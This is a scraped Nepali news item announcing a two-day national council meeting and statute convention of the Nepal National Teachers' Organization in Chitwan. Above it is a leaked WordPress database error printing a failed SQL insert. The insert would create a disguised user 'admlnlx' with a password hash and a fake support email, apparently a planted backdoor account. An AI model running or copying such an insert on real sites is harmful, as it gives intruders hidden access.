WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbyhjNUK39uisK8RbfnXzj85Qf/GvI/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 04:04:05', '', 'admlnlx', 'admlnlx')
चितवन, माघ १४ –
नेपाल राष्ट्रिय शिक्षक सङ्गठनको २०औँ राष्ट्रिय परिषद् बैठक तथा प्रथम विधान अधिवेशन भोलिदेखि यहाँ सुरु हुँदैछ ।
अधिवेशनमा देशभरका ४४७ शिक्षकको सहभागिता रहने सङ्गठनका अध्यक्ष बाबुराम थापाले जानकारी दिनुभयो । राज्य पुनःसंरचना आयोगले राज्य पुनःसंरचना गरेअनुसार सङ्गठनको संरचनालाई अघि बढाउने उद्देश्यले विधान अधिवेशन गर्न लागिएको उहाँले बताउनुभयो ।
अधिवेशनले शैक्षिक प्रक्रियालाई व्यवस्थित गर्दै अघि बढाउन सहज हुने थापाले बताउनुभयो ।
अधिवेशन दुई दिनसम्म चल्नेछ ।